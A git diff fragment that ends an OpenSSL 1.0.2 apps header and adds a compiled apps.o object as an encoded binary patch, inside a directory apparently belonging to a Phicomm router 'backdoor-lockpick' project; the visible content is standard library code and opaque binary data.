+# define FORMAT_PVK      12     /* MS PVK file format */
+# define FORMAT_HTTP     13     /* Download using HTTP */
+
+# define EXT_COPY_NONE   0
+# define EXT_COPY_ADD    1
+# define EXT_COPY_ALL    2
+
+# define NETSCAPE_CERT_HDR       "certificate"
+
+# define APP_PASS_LEN    1024
+
+# define SERIAL_RAND_BITS        64
+
+int app_isdir(const char *);
+int raw_read_stdin(void *, int);
+int raw_write_stdout(const void *, int);
+
+# define TM_START        0
+# define TM_STOP         1
+double app_tminterval(int stop, int usertime);
+
+# define OPENSSL_NO_SSL_INTERN
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/apps.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/apps.o
new file mode 100644
index 0000000000000000000000000000000000000000..6cfeb982963746f5d2e2b33343d53216fbe4fa59
GIT binary patch
literal 60488
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
